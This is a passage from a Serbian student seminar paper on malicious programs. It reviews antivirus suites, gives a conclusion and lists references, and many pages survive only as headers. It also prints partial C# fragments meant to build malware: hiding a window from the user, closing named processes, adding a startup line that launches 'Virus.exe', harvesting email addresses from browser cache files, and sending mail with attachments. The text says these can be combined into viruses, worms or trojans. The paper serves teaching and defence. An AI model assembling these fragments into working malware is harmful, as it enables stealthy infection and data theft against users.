su obično sasvim dovoljne za ličnu upotrebu, ali ne i za poslovnu.
S t r a n a | 46
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 47
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 48
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 49
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Internet Security paket sadrţi alate koji pronalaze viruse i spyware programe.
Korišćenjem napredne proaktivne tehnike zaštite u stanju je da detektuje kako
poznat maliciozan kod, tako i onaj koji se ne nalazi u bazi potpisa virusa. Dobro se
snalazi i sa rootkit pretnjama, a poseduje i anti-phishing zaštitu od prikaza laţnih
web stranica koje imaju za cilj preuzimanje informacija od korisnika. TakoĎe sadrţi
mogućnost aktiviranja roditeljske zaštite, kao i moda za igranje (engl. Gaming
mod). U ovom modu program privremeno spušta zaštitu na nivo koji minimalno utiče
na performanse sistema, čime se igračima omogućava da izvuku maksimum iz
računara, a da pri tom ipak zadrţe i odreĎeni stepen zaštite.
Novinu predstavlja opcija koja detektuje osetljive tačke sistema, kao na
primer postojanje novih bezbednosnih zakrpa za Windows koje nisu instalirane.
Ovime se takoĎe doprinosi povećanju sveukupnog stepena zaštite.
S t r a n a | 51
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 52
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 53
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
prepoznavanje rootkit i botnet aplikacija, kao i još desetak drugih tehnologija zaštite
računara i privatnosti korisnika.
Norton poseduje Norton Insight opciju, koja ima zadatak da identifikuje
datoteke koje su sigurne i proverene. Ove datoteke u budućnosti neće morati
ponovo da se skeniraju, čime se ubrzava proces skeniranja. Antivirusni deo ovog
paketa ponaša se vrlo dobro, što se ne moţe reći za antispyware komponentu, koja
često ne prijavljuje inficirane fajlove.
Norton je sposoban da proverava i stanje na umreţenim računarima, za šta
postoji poseban deo unutar programa. Podrţana je opcija roditeljske kontrole
korišćenja računara, koja se nalazi u sekciji za podešavanje programa, i zahteva
naknadno preuzimanje dodatnih modula sa Interneta.
S t r a n a | 54
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 55
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 56
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
[DllImport("user32.dll")]
public static extern IntPtr FindWindow(string lpClassName,
string lpWindowName);
[DllImport("user32.dll")]
internal static extern int MessageBeep(int uType);
[STAThread]
static void Main(string[] args)
{
//Skrivanje pokrenutog programa
ShowWindow(FindWindow("ConsoleWindowClass", null), 0);
while(true)
{
//Zvuk beep
MessageBeep(100);
S t r a n a | 57
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Klasa koja nosi ime Program, sadrţi samo glavnu (engl. Main) funkciju koja
se izvršava pri pokretanju programa. Ova klasa koristi standardnu Windows
biblioteku user32.dll.
Program bi po pokretanju izvršio prikrivanje svojih aktivnosti, tako što bi sebe
uklonio sa Desktop-a, Taskbar-a i Task Manager-a. Prosečan korisnik (ţrtva) ne bi
bio u stanju da primeti da je program aktiviran na računaru. Dodatne informacije o
funkcijama ShowWindow [70] i FindWindow [71] mogu se pronaći na Microsoft
MSDN sajtu.
S t r a n a | 58
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Process[] myProcesses;
foreach (String _proc in processList)
{
myProcesses = Process.GetProcessesByName(_proc);
{
if (myProcesses.Length > 0)
{
foreach (Process _item in myProcesses)
{
_item.CloseMainWindow();
}
}
}
}
}
S t r a n a | 60
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
using System.IO;
...
//Definisanje funkcionalnosti koja se dodaje
string lines = "\r\nSTART /MAX C:\\Virus.exe";
//Zatvaranje fajla
file.Close();
using System.IO;
using System.Text.RegularExpressions;
...
private static void FindEmails(List<string> directoryList)
{
foreach (string cDirs in directoryList)
{
if (Directory.Exists(cDirs))
{
// Pronalženje svih fajlova sa ekstenzijom html
string[] htmlFiles = Directory.GetFiles(cDirs, "*html");
"[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
// Traženje poklapanja
foreach (Match strMatch in
hRegex.Matches(Encoding.ASCII.GetString(source)))
{
if (strMatch.Success)
{
string t = strMatch.Value;
// Slanje pošte, upis u fajl...
}
}
}
}
}
}
Funkcija FindEmails radi tako što za primljenu listu direktorijuma vrši pretragu
za datotekama sa ekstenzijom html. Promenljiva hRegex definiše šablon po kojem
će se izvršiti pretraga, u ovom slučaju se radi o e-mail regularnom izrazu. Ukoliko su
pronaĎene datoteke sa ekstenzijom html, otvaraju se i njihov sadrţaj se poredi sa
hRegex regularnim izrazom. Rezultat strMatch.Value predstavlja pronaĎenu e-mail
adresu, koja se dalje moţe sačuvati u nekoj tekstualnoj datoteci ili koristiti za slanje.
Više informacija o tome kako se koristi System.Text.RegularExpressions biblioteka
moguće je pronaći na zvaničnom Mictrosoft MSDN sajtu, na adresi [76]. Funkcija
FindEmails se moţe pozvati na sledeći način:
List<string> directoryList = new List<string>();
directoryList.Add("C:\Users\GoranPanic\AppData\Local\Microsoft\
Windows\Temporary Internet Files");
FindEmails(directoryList);
using System.Runtime.InteropServices;
using System.Net.Mail;
...
S t r a n a | 62
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
message.To.Add(MailAddressTo);
message.Subject = Subject;
message.From = new MailAddress(MailAddressFrom);
foreach(Attachment item in att)
{
message.Attachments.Add(item);
}
message.Body = Body;
SmtpClient smtp;
if (port > 0)
{
smtp = new SmtpClient(SmtpClient);
}
else
{
smtp = new SmtpClient(SmtpClient,port);
}
smtp.Send(message);
}
S t r a n a | 63
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 64
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
11.7 Preporuke
Kombinacijom navedenog koda mogu se kreirati zlonamerni programi koji bi
pripadali grupi virusa, crva ili trojanaca.
Upotreba C# koda i .NET tehnologija u kreiranju zlonamernog koda je
generalno loša ideja. Aplikacije su često prevelike u poreĎenju sa aplikacijama koje
nastaju u manje kompleksnim programskim jezicima. Razvoj u .NET framework-u je
drugi ograničavajući faktor, iz razloga što bi takav zlonameran program radio samo
na računarima na kojima je takav framework instaliran.
U cilju smanjenja korišćenih resursa, tvorci zlonamernih programa često
izbegavaju upotrebu rukovanja izuzecima [81]. Takav vid nebrige o inficiranom
računaru često je glavni krivac za pojavu slučajne štete pri izvršenju malicioznog
koda.
Zaštita od programa koji bi bili kreirani upotrebom navedenog koda svodi se
na prevenciju. Korisnik treba sam da vodi računa o tome koje programe pokreće na
računaru. Anti-virusni programi će zlonameran program sa sigurnošću detektovati
kao opasnost samo u slučaju kada njegova definicija već postoji u bazi antivirusa.
Na heurističke metode se ne bi smelo oslanjati.
Ako se već vrši pokretanje sumnjive aplikacije poţeljno je da se to učini bez
upotrebe administratorskih privilegija. Pokretanje programa sa smanjenim
privilegijama će onemogućiti izmenu i brisanje podataka, kako datoteka na disku
tako i vrednosti u registry bazi. Pristupanje nekim resursima internet pretraţivača,
radi pronalaţenja meilova, će uglavnom biti onemogućeno. TakoĎe blokiranje
aktivne zaštite ukidanjem procesa ili izmenom setovanja će biti dodatno oteţano.
S t r a n a | 65
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
12. ZAKLJUČAK
Uporedo sa razvojem računara dolazi do razvoja zlonamernih programa.
Stvar koja je najviše podstakla razvoj i širenje ovih programa je računarska mreţa.
Pre pojave umreţenih računara, jedini način prenosa zlonamernih programa je bio
putem zaraţene diskete, te su takvi programi imali neuporedivo manje šansi za
dalje širenje.
Dolaskom Interneta i servisa poput elektronske pošte, mogućnosti prenosa
zlonamernih programa drastično rastu. Oni su ubrzo počeli da se šire mnogo većom
brzinom i da koriste sofisticiranije načine prenosa. Kako je broj računara sa
pristupom Internetu rastao, a Internet postajao sve više globalna mreţa, tako su i
infekcije bile sve ozbiljnije i najčešće globalnog tipa.
RaĎaju se novi tipovi zlonamernih programa, kojima više nije glavni cilj
nanošenje štete drugim korisnicima, već prikupljanje ili kraĎa informacija od istih.
Upotreba Interneta u obavljanju finansijskih transakcija, dovodi do pojave novog vida
kriminala, elektronskog kriminala. Zlonamerni programi poput trojanskih konja i
rootkit-a predstavljaju glavno oruţje u rukama tehnološki visoko obučenih
kriminalaca.
Činjenica je da zlonamerni programi postoje i na to se dalje ne moţe uticati.
Jedino što je moguće u ovakvoj situaciji je pronalaţenje načina zaštite od takvih
programa. Najefikasniji način zaštite je upotreba nekog antivirusnog paketa.
Pored operativnog sistema, antivirusni paket je druga obavezna komponenta
savremenog računara. Korisnici koji drţe do svoje bezbednosti, moraju posvetiti
vreme odabiru za njihove potrebe najboljeg antivirusnog paketa i njegovom
pravilnom konfigurisanju.
Virusi, crvi i ostali nepoţeljni programi se pojavljuju svakodnevno. Svaki
korisnik, bez obzira na njegovu stručnost, je u stanju da uz pomoć alata za
generisanje zlonamernog koda napravi svoj primerak takvog programa. Jedini način
da se sa sigurnošću zaključi koji je program maliciozan, je detekcija takvog koda na
osnovu potpisa. Za tako nešto je neophodno da se definicija virusa nalazi u bazi
antivirusnog paketa. Neredovno osveţavanje baze virusa najnovijim definicijama
virusa, ima za posledicu slabljenje odbrambenog sistema antivirusnog programa.
Trenutno najveća briga korisnika koji poseduju redovno aţuriran antivirusni
program na svom računaru, predstavljaju sam operativni sistem i loše
implementirane aplikacije. Rešenje ovog problema se svodi na instaliranje
najnovijih bezbednosnih zakrpa za operativni sistem i ostale loše implementirane
programe koje korisnik ima instalirane na svom računaru.
Dobro konfigurisan firewall će predstavljati dodatnu prepreku za sve vrste
malicioznih programa. TakoĎe, njegova loša konfiguracija moţe doneti više štete
nego koristi.
Iz ovoga moţemo videti da je poţeljna zaštita u slojevima. Veći broj slojeva
oteţava posao zlonamernim programima, a time smanjuje mogućnost infekcije.
S t r a n a | 66
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 67
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
13. LITERATURA
Reference
Stallings, W. (2007), “Network Security Essentials - Applications and Standards 3th
edition“, Upper Saddle River, New Jersey.
Pleskonjić, D., Maček, N., ĐorĎević, B. i Carić, M. (2007), “Sigurnost računarskih
sistema i mreţa”, Mikro knjiga, Beograd.
Ţdrnja, B. (2003), “Šta su i kako rade virusi”, Prvi korak, Zagreb.
Bubanja, B. (2009), “Antivirusni paketi”, Svet Kompjutera, 1. jun, str. 60 – 63.
Web stranice
[1] Wikipedia, Computer virus, dostupno na:
http://en.wikipedia.org/wiki/Computer_virus (pregledano 3. januara 2010.)
[2] Wikipedia, Computer worm, dostupno na:
http://en.wikipedia.org/wiki/Computer_worm (pregledano 3. januara 2010.)
[3] Wikipedia, Trojan horse (computing), dostupno na:
http://en.wikipedia.org/wiki/Trojan_horse_(computing) (pregledano 3. januara 2010.)
[4] Wikipedia, Logic bomb, dostupno na: http://en.wikipedia.org/wiki/Logical_bomb
(pregledano 3. januara 2010.)
[5] Wikipedia, Denial-of-service attack, dostupno na:
http://en.wikipedia.org/wiki/Denial-of-service_attack (pregledano 3. januara 2010.)
[6] Wikipedia, Spyware, dostupno na: http://en.wikipedia.org/wiki/Spyware
(pregledano (pregledano 04. januara 2010.)
[7] Wikipedia, Adware, dostupno na: http://en.wikipedia.org/wiki/Adware (pregledano
04. januara 2010.)
[8] Wikipedia, Rootkit, dostupno na: http://en.wikipedia.org/wiki/Rootkit (pregledano
13. januara 2010.)
[9] Wikipedia, Brain (computer virus), dostupno na:
http://en.wikipedia.org/wiki/Brain_(computer_virus) (pregledano 7. januara 2010.)
[10] Wikipedia, Stoned (computer virus), dostupno na:
http://en.wikipedia.org/wiki/Stoned_virus (pregledano 7. januara 2010.)
[11] Wikipedia, Cascade (computer virus), dostupno na:
http://en.wikipedia.org/wiki/Cascade_virus (pregledano 12. januara 2010.)
[12] Wikipedia, Morris worm, dostupno na: http://en.wikipedia.org/wiki/Morris_Worm
(pregledano 12. januara 2010.)
[13] CERT, dostupno na: http://www.cert.org (pregledano 12. januara 2010.)
S t r a n a | 68
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 69
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 70
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 71
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 72